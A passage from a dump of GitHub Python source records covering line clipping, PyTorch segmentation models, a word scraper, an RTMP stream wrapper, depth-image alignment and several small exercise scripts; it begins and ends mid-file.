Abaixo, 2 = Direita, 3 = Esquerda, 4 = Esq. Topo, 5 = Dir. Topo, 6 = Dir. Baixo, 7 = Esq. Baixo\n border = -1\n\n x = 0\n y = 0\n\n # Topo\n if region_code[0]:\n x = coord[0] + ((1 / line_declive) * (y_topo - coord[1]))\n\n # Esquerda Topo\n if region_code[3]:\n y = coord[1] + (line_declive * (x_esquerda - coord[0]))\n\n if x < x_esquerda and y <= y_topo:\n border = 3\n x = x_esquerda\n elif y > y_topo and x >= x_esquerda:\n border = 0\n y = y_topo\n else:\n border = 4\n\n # Direita Topo\n elif region_code[2]:\n y = coord[1] + (line_declive * (x_direita - coord[0]))\n\n if x > x_direita and y <= y_topo:\n border = 2\n x = x_direita\n if y > y_topo and x <= x_direita:\n border = 0\n y = y_topo\n else:\n border = 5\n else:\n border = 0\n y = y_topo\n\n # Fundo\n elif region_code[1]:\n x = coord[0] + ((1 / line_declive) * (y_fundo - coord[1]))\n\n # Esquerda Baixo\n if region_code[3]:\n y = coord[1] + (line_declive * (x_esquerda - coord[0]))\n\n if x < x_esquerda and y >= y_fundo:\n border = 3\n x = x_esquerda\n elif y < y_fundo and x >= x_esquerda:\n border = 1\n y = y_fundo\n else:\n border = 7\n\n # Direita Baixo\n elif region_code[2]:\n y = coord[1] + (line_declive * (x_direita - coord[0]))\n\n if x > x_direita and y >= y_fundo:\n border = 2\n x = x_direita\n if y < y_fundo and x <= x_direita:\n border = 1\n y = y_fundo\n else:\n border = 6\n else:\n border = 1\n y = y_fundo\n\n # Direita\n elif region_code[2]:\n border = 2\n x = x_direita\n y = coord[1] + (line_declive * (x_direita - coord[0]))\n\n # Esquerda\n elif region_code[3]:\n border = 3\n x = x_esquerda\n y = coord[1] + (line_declive * (x_esquerda - coord[0]))\n\n return {'coord': [x, y], 'border': border}\n\ndef calculateRegionCodes(normalized_coordinates: list) -> list:\n region_codes = list()\n for index in range(len(normalized_coordinates)):\n region_code = list()\n dot = normalized_coordinates[index]\n x = dot[0]\n y = dot[1]\n\n if y > canvas[2][1]: # Yi > Ywtopo ?\n region_code.append(1)\n else:\n region_code.append(0)\n\n if y < canvas[0][1]: # Yi < Ywfundo ?\n region_code.append(1)\n else:\n region_code.append(0)\n\n if x > canvas[1][0]: # Xi > Xwdir ?\n region_code.append(1)\n else:\n region_code.append(0)\n\n if x < canvas[0][0]: # Xi < Xwesq ?\n region_code.append(1)\n else:\n region_code.append(0)\n\n region_codes.append(region_code)\n return region_codes","repo_name":"DavidGrunheidt/Graphic-System","sub_path":"clipper.py","file_name":"clipper.py","file_ext":"py","file_size_in_byte":6705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2465862404","text":"from .segments import InitConv, ConvDown, DeconvUp, FinalConv, AdditionalLayers, InceptionModule, ConvInception, FirstUpscaling, Upscaling, Final\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass SkinnyInception(nn.Module):\n \"\"\"\n Skinny architecture variant with inception modules.\n \"\"\"\n\n def __init__(self, n_channels: int, n_classes: int):\n super(SkinnyInception, self).__init__()\n\n self.n_channels = n_channels\n self.n_classes = n_classes\n\n self.down1 = (ConvInception(self.n_channels, 20))\n self.down2 = (ConvInception(20, 40))\n self.down3 = (ConvInception(40, 80))\n self.down4 = (ConvInception(80, 160))\n self.down5 = (ConvInception(160, 320))\n\n self.up1 = (FirstUpscaling(320))\n self.up2 = (Upscaling(640))\n self.up3 = (Upscaling(320))\n self.up4 = (Upscaling(160))\n self.up5 = (Upscaling(80))\n\n self.final = (Final(40, self.n_classes))\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n # x2-x6 receive max-pooled inputs\n x1 = self.down1(x)\n x2 = self.down2(F.max_pool2d(x1, 2))\n x3 = self.down3(F.max_pool2d(x2, 2))\n x4 = self.down4(F.max_pool2d(x3, 2))\n x5 = self.down5(F.max_pool2d(x4, 2))\n\n x6 = self.up1(F.max_pool2d(x5, 2), x5)\n x6 = self.up2(x6, x4)\n x6 = self.up3(x6, x3)\n x6 = self.up4(x6, x2)\n x6 = self.up5(x6, x1)\n\n x6 = self.final(x6)\n\n return x6\n\n\nclass SkinnyBasic(nn.Module):\n \"\"\"\n Skinny architecture variant without inception modules.\n \"\"\"\n\n def __init__(self, n_channels: int, n_classes: int):\n super(SkinnyBasic, self).__init__()\n\n self.n_channels = n_channels\n self.n_classes = n_classes\n\n self.init = (InitConv(self.n_channels, 15))\n\n self.conv_down1 = (ConvDown(15, 30))\n self.conv_down2 = (ConvDown(30, 60))\n self.conv_down3 = (ConvDown(60, 120))\n self.conv_down4 = (ConvDown(120, 240))\n\n self.additional = (AdditionalLayers())\n\n self.deconv_up1 = (DeconvUp(240, 480))\n self.deconv_up2 = (DeconvUp(480, 240))\n self.deconv_up3 = (DeconvUp(240, 120))\n self.deconv_up4 = (DeconvUp(120, 60))\n self.deconv_up5 = (DeconvUp(60, 30))\n\n self.final = (FinalConv(30, n_classes))\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x1 = self.init(x)\n x2 = self.conv_down1(x1)\n x3 = self.conv_down2(x2)\n x4 = self.conv_down3(x3)\n x5 = self.conv_down4(x4)\n x6 = self.additional(x5)\n\n x7 = self.deconv_up1(x6, x5)\n x8 = self.deconv_up2(x7, x4)\n x9 = self.deconv_up3(x8, x3)\n x10 = self.deconv_up4(x9, x2)\n x11 = self.deconv_up5(x10, x1)\n\n output = self.final(x11)\n\n return output\n","repo_name":"Maugosia/hand-segmentation-nn","sub_path":"skinny/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35426843965","text":"import sqlite3\nfrom bs4 import BeautifulSoup\n\ncon = sqlite3.connect(\"words.db\")\n\ncur = con.cursor()\n\n\ndef define_sql():\n # Create table\n con.execute(\n '''\n CREATE TABLE IF NOT EXISTS words(\n id integer primary key AUTOINCREMENT, word varchar(255), word_length integer,\n UNIQUE(word)\n );\n '''\n )\n\n # Create Secondary Index\n con.execute(\n '''\n CREATE INDEX IF NOT EXISTS word_length ON words(word_length)\n '''\n )\n\n\ndef insert_word(word: str, word_length: int):\n try:\n con.execute(\n f'''\n INSERT INTO words(word, word_length) VALUES(?, ?);\n ''', (word.lower(), word_length)\n )\n except:\n print(f\"Some Error while inserting: {word}\")\n\n\ndefine_sql()\n\n\ndef scrap_file(file):\n soup = BeautifulSoup(file, features='lxml')\n\n dup_check = []\n\n for line in soup.find_all('p'):\n for word in line.find_next('b'):\n\n if word.__contains__(\"'\") or word.__contains__('-') or word.__contains__(' '):\n continue\n\n if len(dup_check) == 0:\n dup_check.append(word)\n else:\n if word == dup_check[0]:\n continue\n else:\n dup_check.pop()\n dup_check.append(word)\n print(\"Inserting {}\".format(word))\n insert_word(word, len(word))\n\n file.close()\n\n\ndef scrap_word():\n for alp in range(ord('a'), ord('z') + 1):\n file = open(f\"words/{chr(alp)}.html\", mode='r')\n scrap_file(file)\n file.close()\n file = open('words/new.html', mode='r')\n scrap_file(file)\n file.close()\n\n\nscrap_word()\n\ncon.commit()\ncon.close()","repo_name":"abughalib/wordle_solver","sub_path":"populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"2374816703","text":"from io import IOBase\n\nfrom . import ffi, librtmp\nfrom .compat import byte_types\nfrom .exceptions import RTMPError\n\n__all__ = [\"RTMPStream\"]\n\n\nclass RTMPStream(IOBase):\n \"\"\"A file-like interface to a stream within\n a RTMP session.\"\"\"\n\n def __init__(self, client, update_buffer=True):\n self.client = client\n self._buf = self._view = None\n self._closed = False\n self._update_buffer = update_buffer\n self._updated_buffer = False\n\n def read(self, size):\n \"\"\"Attempts to read data from the stream.\n\n :param size: int, The maximum amount of bytes to read.\n\n Raises :exc:`IOError` on error.\n \"\"\"\n # If enabled tell the server that our buffer can fit the whole\n # stream, this often increases throughput alot.\n if self._update_buffer and not self._updated_buffer and self.duration:\n self.update_buffer((self.duration * 1000) + 5000)\n self._updated_buffer = True\n\n if not self._buf or len(self._buf) != size:\n self._buf = ffi.new(\"char[]\", size)\n self._view = ffi.buffer(self._buf, size)\n\n res = librtmp.RTMP_Read(self.client.rtmp, self._buf, size)\n\n if res < 0:\n raise IOError(\"Failed to read data\")\n\n return self._view[:res]\n\n def write(self, data):\n \"\"\"Writes data to the stream.\n\n :param data: bytes, FLV data to write to the stream\n\n The data passed can contain multiple FLV tags, but it MUST\n always contain complete tags or undefined behaviour might\n occur.\n\n Raises :exc:`IOError` on error.\n \"\"\"\n if isinstance(data, bytearray):\n data = bytes(data)\n\n if not isinstance(data, byte_types):\n raise ValueError(\"A bytes argument is required\")\n\n res = librtmp.RTMP_Write(self.client.rtmp, data, len(data))\n\n if res < 0:\n raise IOError(\"Failed to write data\")\n\n return res\n\n def pause(self):\n \"\"\"Pauses the stream.\"\"\"\n res = librtmp.RTMP_Pause(self.client.rtmp, 1)\n\n if res < 1:\n raise RTMPError(\"Failed to pause\")\n\n def unpause(self):\n \"\"\"Unpauses the stream.\"\"\"\n res = librtmp.RTMP_Pause(self.client.rtmp, 0)\n\n if res < 1:\n raise RTMPError(\"Failed to unpause\")\n\n def seek(self, time):\n \"\"\"Attempts to seek in the stream.\n\n :param time: int, Time to seek to in seconds\n\n \"\"\"\n res = librtmp.RTMP_SendSeek(self.client.rtmp, time)\n\n if res < 1:\n raise RTMPError(\"Failed to seek\")\n\n def close(self):\n \"\"\"Closes the connection.\"\"\"\n if not self._closed:\n self._closed = True\n self.client.close()\n\n def update_buffer(self, ms):\n \"\"\"Tells the server how big our buffer is (in milliseconds).\"\"\"\n librtmp.RTMP_SetBufferMS(self.client.rtmp, int(ms))\n librtmp.RTMP_UpdateBufferMS(self.client.rtmp)\n\n @property\n def duration(self):\n \"\"\"The duration of the stream.\"\"\"\n return librtmp.RTMP_GetDuration(self.client.rtmp)\n","repo_name":"chrippa/python-librtmp","sub_path":"librtmp/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","stars":148,"dataset":"github-code","pt":"51"} +{"seq_id":"3244700713","text":"from genesis.tools import lextagger as LT\n\n\nsentence = \"I like oranges and apples\"\n\n# run the spacy nlp module\nsyntax_parsed = LT.nlp(sentence)\n\nfor token in syntax_parsed:\n print(token, token.pos_, token.dep_, LT.deep_syntax(token))\n\nprint(\"+++++\")\n\nfor token in syntax_parsed:\n print(token, LT.lookup_all(token))\n\n# lookup like independently\nlexicon_like, ontology_like = LT.lookup_all(syntax_parsed[1])\n\n# lets take the second returned entry from the lexicon lookup\nwlike = lexicon_like[1]\n\n# or the first ontology lookup\nscore, wlike = ontology_like[0]\n\n\nprint(\"+++++\")\nprint(wlike.wclass.onttype)\n\n# you should really just explore from here\n","repo_name":"tripslab/vagrant-trips","sub_path":"shared/examples/lookup_words.py","file_name":"lookup_words.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"38158859083","text":"import cv2 # state of the art computer vision algorithms library\r\nimport numpy as np # fundamental package for scientific computing\r\nimport matplotlib.pyplot as plt # 2D plotting library producing publication quality figures\r\nimport pyrealsense2 as rs # Intel RealSense cross-platform open-source API\r\nimport os\r\n\r\n\r\ndef depth2hue(depth_arr):\r\n d_min = 600\r\n d_max = 10000\r\n [rows, cols] = depth_arr.shape\r\n hue_image = np.zeros([rows, cols, 3])\r\n for i in range(0, rows):\r\n for j in range(0, cols):\r\n d = depth_arr[i, j]\r\n if d < d_min or d > d_max:\r\n hue_image[i, j, :] = 0\r\n else:\r\n d_normal = 1529 * (d - d_min) / (d_max - d_min)\r\n # print(d_normal)\r\n # pr\r\n if (0 <= d_normal <= 255) or (1257 < d_normal <= 1529):\r\n hue_image[i, j, 0] = 255\r\n elif 255 < d_normal <= 510:\r\n hue_image[i, j, 0] = 510 - d_normal\r\n elif 510 < d_normal <= 1020:\r\n hue_image[i, j, 0] = 0\r\n elif 1020 < d_normal <= 1275:\r\n hue_image[i, j, 0] = d_normal - 1020\r\n # pg\r\n if 0 < d_normal <= 255:\r\n hue_image[i, j, 1] = d_normal\r\n elif 255 < d_normal <= 510:\r\n hue_image[i, j, 1] = 255\r\n elif 510 < d_normal <= 765:\r\n hue_image[i, j, 1] = 255\r\n elif 765 < d_normal <= 1020:\r\n hue_image[i, j, 1] = 1020 - d_normal\r\n elif 1020 < d_normal <= 1529:\r\n hue_image[i, j, 1] = 0\r\n # pb\r\n if 0 < d_normal <= 510:\r\n hue_image[i, j, 2] = 0\r\n elif 510 < d_normal <= 765:\r\n hue_image[i, j, 2] = d_normal - 510\r\n elif 765 < d_normal <= 1020:\r\n hue_image[i, j, 2] = 255\r\n elif 1020 < d_normal <= 1275:\r\n hue_image[i, j, 2] = 255\r\n elif 1275 < d_normal <= 1529:\r\n hue_image[i, j, 2] = 1530 - d_normal\r\n hue_image = np.array(hue_image, dtype='uint8')\r\n return hue_image\r\n\r\n\r\ndef depth_normalization(depth_arr):\r\n d_min = 600\r\n d_max = 10000\r\n [rows, cols] = depth_arr.shape\r\n for i in range(0, rows):\r\n for j in range(0, cols):\r\n d = depth_arr[i, j]\r\n if d < d_min or d > d_max:\r\n depth_arr[i, j] = 0\r\n depth_arr = np.array(depth_arr, dtype='uint16')\r\n return depth_arr\r\n\r\n\r\nprint(\"Environment Ready\")\r\n# File names and paths initialization\r\nframe_number = 900\r\nimage_number = \"19\"\r\nbag_filename = \"20200707_160533\"\r\n\r\nbasic_name = bag_filename+'_'+image_number\r\nbag_basepath = r\"F:\\Uob Dissertation Dataset\\rosbag files\"\r\nbag_dir = os.path.join(bag_basepath, bag_filename+'.bag')\r\nsavepath_root = r\"F:\\Uob Dissertation Dataset\\Aligned footpath dataset_new\"\r\nsavepath = os.path.join(savepath_root, bag_filename)\r\n\r\n# Setup:\r\npipe = rs.pipeline()\r\ncfg = rs.config()\r\ncfg.enable_device_from_file(bag_dir)\r\nprofile = pipe.start(cfg)\r\n\r\n# Skip 5 first frames to give the Auto-Exposure time to adjust\r\nfor x in range(frame_number):\r\n pipe.wait_for_frames()\r\n\r\n# Store next frameset for later processing:\r\nframeset = pipe.wait_for_frames()\r\ncolor_frame = frameset.get_color_frame()\r\ndepth_frame = frameset.get_depth_frame()\r\n\r\n# Cleanup:\r\npipe.stop()\r\nprint(\"Frames Captured\")\r\n\r\n# Original color frame\r\ncolor = np.asanyarray(color_frame.get_data())\r\nplt.rcParams[\"axes.grid\"] = False\r\nplt.rcParams['figure.figsize'] = [12, 6]\r\nplt.imshow(color)\r\n# plt.show()\r\n\r\n# Original colirized depth frame\r\ncolorized_depth_arr = np.asanyarray(depth_frame.get_data())\r\ncolorized_depth = depth2hue(colorized_depth_arr)\r\nplt.imshow(colorized_depth)\r\n# plt.show()\r\nimages = np.hstack((color, colorized_depth))\r\nplt.imshow(images)\r\nplt.show()\r\n\r\n# Create alignment primitive with color as its target stream:\r\nalign = rs.align(rs.stream.color)\r\nframeset = align.process(frameset)\r\n\r\n# Update color and depth frames:\r\naligned_depth_frame = frameset.get_depth_frame()\r\naligned_depth = np.asanyarray(aligned_depth_frame.get_data())\r\naligned_depth = depth_normalization(aligned_depth)\r\n# print(aligned_depth)\r\n# print(aligned_depth.shape)\r\n# Save the normalized depth data as npy\r\ndepth_filename = basic_name+'_depth.npy'\r\ntemp_dir = os.path.join(savepath, depth_filename)\r\n# np.save(temp_dir, aligned_depth)\r\n\r\n# colorized_depth_arr = np.asanyarray(aligned_depth_frame.get_data())\r\ncolorized_depth = depth2hue(aligned_depth)\r\n\r\n# Show the two frames together:\r\nimages = np.hstack((color, colorized_depth))\r\nplt.imshow(images)\r\nplt.show()\r\n\r\n# plt.imshow(color)\r\n# plt.show()\r\ncolor_bgr = cv2.cvtColor(color, cv2.COLOR_RGB2BGR)\r\ntemp_dir = os.path.join(savepath, basic_name+'_color.png')\r\n# cv2.imwrite(temp_dir, color_bgr)\r\n\r\n# plt.imshow(colorized_depth)\r\n# plt.show()\r\ncolorized_depth_bgr = cv2.cvtColor(colorized_depth, cv2.COLOR_RGB2BGR)\r\ntemp_dir = os.path.join(savepath, basic_name+'_depth_visualization.png')\r\n# cv2.imwrite(temp_dir, colorized_depth_bgr)\r\n\r\n","repo_name":"luoyizhi516/Mask-R-CNN-for-Footpath-Detection","sub_path":"rgb-depth alignment 2.0.py","file_name":"rgb-depth alignment 2.0.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33636684214","text":"import sys\nsys.stdin = open(\"C:/Users/현대오토13/Desktop/수진_개인파일/파이썬/input.txt\",\"r\")\nn=int(input())\nm=int(input())\nxs = list(map(int,input().split()))\n\nmax_v = 0\nfor i in range(m):\n if i == 0:\n max_v = xs[i] - 0\n \n if i == m-1:\n max_v = max(max_v,n-xs[m-1])\n\n if m>1 and i>0: #가로등이 2개이상이고, 2번째 가로등일 때,\n if (xs[i] - xs[i-1]) % 2 == 0:\n tmp=(xs[i] - xs[i-1]) // 2\n elif (xs[i] - xs[i-1]) % 2 != 0:\n tmp=(xs[i] - xs[i-1]) // 2 + 1\n\n max_v = max(max_v,tmp)\n \n\nprint(max_v)","repo_name":"sujinH/python_bj","sub_path":"17266_1.py","file_name":"17266_1.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5609827007","text":"class BrowserHistory:\n\n def __init__(self, homepage: str):\n self.head = Node(homepage)\n self.curr = self.head\n \n def visit(self, url: str) -> None:\n new_node = Node(url)\n new_node.prev = self.curr\n self.curr.next = new_node\n self.curr = new_node\n \n \n def back(self, steps: int) -> str:\n i = 0\n while i < steps and self.curr.prev:\n self.curr = self.curr.prev\n i += 1\n return self.curr.val\n\n def forward(self, steps: int) -> str:\n i = 0\n while i < steps and self.curr.next:\n self.curr = self.curr.next\n i += 1\n return self.curr.val\n \nclass Node:\n def __init__(self,val):\n self.val = val\n self.next = None\n self.prev = None\n\n# Your BrowserHistory object will be instantiated and called as such:\n# obj = BrowserHistory(homepage)\n# obj.visit(url)\n# param_2 = obj.back(steps)\n# param_3 = obj.forward(steps)","repo_name":"EyasuTesfu/Competitive-Programming","sub_path":"1472-design-browser-history/1472-design-browser-history.py","file_name":"1472-design-browser-history.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3244488651","text":"atiradores = []\nnomes = []\ndistancias = []\nsexos = []\nacertou_M = []\ndistancias_F = []\n\n# quantidade de participantes, nome, sexo, distância\nquantidade = int(input('Digite aqui a quantidade de participantes: '))\n\nwhile quantidade > 0:\n nome = input('Digite aqui o nome do policial: ')\n nomes.append(nome)\n sexo = input('Digite aqui o sexo do policial[M/F]: ')\n sexos.append(sexo)\n distancia = float(input('Digite aqui a distância(em centímetros) em relação ao alvo: '))\n distancias.append(distancia)\n if distancia < 1:\n atiradores.append(distancia)\n if sexo in 'Ff':\n distancias_F.append(distancia)\n if sexo in 'Mm':\n if distancia == 0:\n acertou_M.append(distancia)\n\n quantidade -= 1\n\n# melhor atirador/pior atirador\nmelhor = min(distancias)\nauxiliar_1 = distancias.index(melhor)\npolicial_1 = nomes[auxiliar_1]\nsexo_1 = sexos[auxiliar_1]\n\npior = max(distancias)\nauxiliar_2 = distancias.index(pior)\npolicial_2 = nomes[auxiliar_2]\nsexo_2 = sexos[auxiliar_2]\n\n\n\nprint(f'O percentual de policiais que alcançaram o título de atiradores de elite foi de {(len(atiradores) / len(nomes))*100 :.2f}%')\nprint(f'O melhor atirador foi {policial_1}, do sexo {sexo_1}, com a distância de {melhor} em relação ao alvo')\nprint(f'O pior atirador foi {policial_2}, do sexo {sexo_2}, com a distância de {pior} em relação ao alvo')\nprint(f'A quantidade de homens que acertou o alvo foi de {len(acertou_M)}')\nif len(distancias_F) != 0:\n print(f'A média da distância ao alvo obtida pelas atiradoras foi de {sum(distancias_F)/len(distancias_F)}')\n","repo_name":"AndradeLaryssa/Python","sub_path":"Atiradores.py","file_name":"Atiradores.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5431614575","text":"import pandas as pd\r\nimport numpy as np\r\n\r\nID10x = pd.read_csv(\"./B10x/B10x_sequences.csv\")\r\nbarcode = pd.read_csv(\"./B10x/B10x_sequences_with_barcodes_UMI.csv\", index_col=0)\r\n\r\nID10x = ID10x.rename(columns={\"Unnamed: 0\":\"10x_ID\"})\r\n\r\nprint(ID10x.dtypes)\r\nprint(barcode.dtypes)\r\n\r\ncomplete = pd.merge(ID10x, barcode, left_on=[\"alpha\", \"beta\", \"peptide\", \"mhc\"], right_on=[\"alpha\", \"beta\", \"peptide\", \"mhc\"])\r\n\r\nprint(complete)\r\nprint(np.shape(ID10x), np.shape(barcode))\r\n\r\ncomplete.to_csv(\"./B10x/B10x_all_sequences_with_10xID_barcode_binding_UMI.csv\")\r\n","repo_name":"mm523/TCR-structure-binding-prediction","sub_path":"prepare_fasta_files/10x_barcodes_to_ID.py","file_name":"10x_barcodes_to_ID.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5773793339","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom copy import deepcopy, copy\r\nOPERATORS={\"+\":lambda x, y: x+y, \"-\":lambda x, y: x-y, \"*\":lambda x, y: x*y, \"/\":lambda x, y: x/y, \"**\":lambda x, y: x**y}\r\nLIST_LIMIT=256\r\nNatural=(0, float(\"inf\"), 1, False)\r\nInteger=(float(\"-inf\"), float(\"inf\"), 1, False)\r\nReal=(float(\"-inf\"), float(\"inf\"), 0, False)\r\nComplex=(float(\"-inf\"), float(\"inf\"), 0, True)\r\n\r\ndef compile_text(func=None):\r\n if func==None:\r\n return []\r\n i, res=0, []\r\n while i1 and type(res[-2])==int and res[-1] not in list(\"+-*/\")+[\"**\"]:\r\n res.insert(-1, \"*\")\r\n i+=1\r\n return res\r\n\r\ndef get(self, args=(), edit=False, kwargs={}):\r\n if type(type(self.func[0]))==type(type(self)):\r\n return [calculate(self, f.func, [args, kwargs]) for f in self.func if type(type(f))==type(type(self))]\r\n if len(args)>0 and type(args[0])==dict:\r\n kwargs, args=args[0], ()\r\n if edit:\r\n calculate(self, self.func, [args, kwargs])\r\n else:\r\n return calculate(self, deepcopy(self.func), [args, kwargs])\r\n\r\ndef calculate(self, func, args):\r\n if type(func)!=list:\r\n return func\r\n i, args, arg_cash=0, args[0], args[1]\r\n for n in [i for i in range(len(func)) if (type(func[i])==str and func[i] not in OPERATORS) or type(func[i])==list]:\r\n if type(func[n])==list:\r\n func[n]=calculate(self, func[n], [args[i:], arg_cash])\r\n elif func[n] in arg_cash:\r\n func[n]=arg_cash[func[n]]\r\n elif iv[1]: raise TypeError(f\"argument more than {v[1]} in function {self}\")\r\n if v[2]>0 and (arg_cash[k]*(v[2]**-1)%1): raise TypeError(f\"argument is not correct: minimum step is {v[2]} in function {self}\")\r\n \r\n if True in [((type(f)==str and f not in OPERATORS) or type(f)==list) for f in func]:\r\n return func\r\n else:\r\n arg, func=func[0], func[1:]\r\n for o, n in zip(func[::2], func[1::2]):\r\n arg=OPERATORS[o](arg, n)\r\n return arg\r\n \r\n\r\ndef show(self, start=0, stop=10):\r\n fig, ax = plt.subplots(figsize=(5, 5), layout='constrained')\r\n x=list(to_list(self, max=100))\r\n ax.plot(np.linspace(-10, 10, len(x)), x, label=f'y=f(x)')\r\n ax.set_xlabel(\"x\")\r\n ax.set_ylabel('y')\r\n ax.set_title(\"Function\")\r\n ax.legend()\r\n plt.show()\r\n\r\ndef to_list(self, start=None, stop=None, step=None, max=LIST_LIMIT):\r\n start, stop, step=-max**(1/2) if start==None else start, max**(1/2) if stop==None else stop, max**(-1/2)*2 if step==None else step\r\n for k, v in self.type.items():\r\n if k in self.func:\r\n start=v[0] if startv[1] else stop\r\n step=v[2] if stepLIST_LIMIT: raise TypeError(f\"list biggest than {LIST_LIMIT}\")\r\n l=np.linspace(start, stop, int((stop-start)/step)+1)\r\n for l1 in l:\r\n c=calculate(self, deepcopy(self.func), [[l1], {}])\r\n if type(c)!=list:\r\n yield c\r\n else:\r\n yield np.array(list(type(self)(c, self.type)), dtype=float)\r\n\r\ndef __add__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n f.func+=[\"+\", f1.func] if type(f1)==type(f) else [\"+\", f1]\r\n else:\r\n self.func+=[\"+\", num.func] if type(num)==type(self) else [\"+\", num]\r\n return self\r\ndef __sub__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n f.func+=[\"-\", f1.func] if type(f1)==type(f) else [\"-\", f1]\r\n else:\r\n self.func+=[\"-\", num.func] if type(num)==type(self) else [\"-\", num]\r\n return self\r\ndef __mul__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n f.func+=[\"*\", f1.func] if type(f1)==type(f) else [\"*\", f1]\r\n else:\r\n self.func+=[\"*\", num.func] if type(num)==type(self) else [\"*\", num]\r\n return self\r\ndef __truediv__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n f.func+=[\"/\", f1.func] if type(f1)==type(f) else [\"/\", f1]\r\n else:\r\n self.func+=[\"/\", num.func] if type(num)==type(self) else [\"/\", num]\r\n return self\r\ndef __pow__(self, num):\r\n if type(type(self.func[0]))==type(type(self)):\r\n for f, f1 in zip(self.func, num.func):\r\n f.func+=[\"**\", f1.func] if type(f1)==type(f) else [\"**\", f1]\r\n else:\r\n self.func+=[\"**\", num.func] if type(num)==type(self) else [\"**\", num]\r\n return self\r\ndef __neg__(self):\r\n self.func+=[\"*\", -1]\r\n return self\r\n\r\n\r\n\r\ndef calc_str(_list):\r\n res=\"\"\r\n for i in _list:\r\n if type(i)==list:\r\n res+=\"(\"+str(calc_str(i))+\")\"\r\n else:\r\n res+=str(i)\r\n return res\r\n\r\ndef to_str(self):\r\n if type(type(self.func[0]))==type(type(self)):\r\n res=\"(\"+str([f.__str__() for f in self.func if type(type(f))==type(type(self))]).replace(\"'\", \"\")[1:-1]+\")\"\r\n else:\r\n res=calc_str(self.func)\r\n if type(get(self))!=list:\r\n return str(get(self))\r\n for k, v in self.type.items():\r\n res+=\"\\n\"+(str(v[0])+'<=' if v[0]!=float('-inf') else '')+(k)+('<='+str(v[1]) if v[1]!=float('inf') else '')+(' step='+str(v[2]) if v[2]!=0 else '')+(' complex' if v[3] else ' real')\r\n return res\r\n\r\nclass MathObject(type):\r\n def __new__(self, name, bases, namespace):\r\n for o, n, func in [(\"+\", \"__add__\", __add__), (\"-\", \"__sub__\", __sub__), (\"*\", \"__mul__\", __mul__), (\"/\", \"__truediv__\", __truediv__), (\"**\", \"__pow__\", __pow__)]:\r\n if n in namespace:\r\n x, f=namespace[n](), copy(func)\r\n namespace[n]=lambda x1, x2, o=o: x[1](x1.func+[o, x2.func]) if type(x2)==x[0] else f(x1, x2)\r\n else:\r\n namespace[n]=copy(func)\r\n if \"__iter__\" in namespace:\r\n namespace[\"iter\"]=namespace[\"__iter__\"]()\r\n namespace.update({\"get\": lambda self, *args, edit=False, **kwargs: type(self)(get(self, args, edit, kwargs)), \"show\": show, \"__iter__\": to_list, \"to_list\": to_list, \"__neg__\": __neg__})\r\n if not \"__str__\" in namespace:\r\n namespace[\"__str__\"]=to_str\r\n else:\r\n n=namespace[\"__str__\"]\r\n namespace[\"__str__\"]=lambda x: n(x, to_str(x))\r\n return super().__new__(self, name, bases, namespace)\r\n \r\n def __call__(self, func=None, arg=None, **kwargs):\r\n new_instance = super(MathObject, self).__call__()\r\n new_instance.type=kwargs if arg==None else arg\r\n new_instance.func=func if type(func)==list else compile_text(func) if type(func)==str else [func]\r\n if hasattr(new_instance, \"__arg__\"):\r\n func=get(new_instance, kwargs=new_instance.__arg__())\r\n new_instance.func=func if type(func)==list else compile_text(func) if type(func)==str else [func]\r\n if hasattr(new_instance, \"iter\"):\r\n new_instance.func=[new_instance.iter[0](f) for f in func[:new_instance.iter[1]]]\r\n return new_instance\r\n\r\n\r\nclass Num(metaclass=MathObject):\r\n pass\r\n\r\ndef summa(d:int, u:int, n:Num):\r\n res=0\r\n for x in range(d, u+1):\r\n res+=n.get(x)\r\n return res\r\n\r\ndef prod(d:int, u:int, n:Num):\r\n res=1\r\n for x in range(d, u+1):\r\n res*=n.get(x)\r\n return res\r\n\r\ndef factorial(n):\r\n res=1\r\n for x in range(2, n+1):\r\n res*=x\r\n return res\r\n\r\ndef absolute(n):\r\n return -n if n<0 else n\r\n\r\ndef approxequal(num, epsilon):\r\n return num//epsilon*epsilon\r\n\r\n\r\ndef period(a:int, b:int):\r\n cash=[]\r\n while a!=0:\r\n a*=10\r\n cash.append(a//b)\r\n if cash[int(len(cash)/2):]==cash[:int(len(cash)/2)]:\r\n break\r\n a%=b\r\n cash[int(len(cash)/2):]\r\n\r\nclass Time(metaclass=MathObject):\r\n def __str__(self, x) -> str:\r\n if x.replace(\".\", \"\").isdigit():\r\n x=float(x)\r\n if x<3600 and 60 str:\r\n return 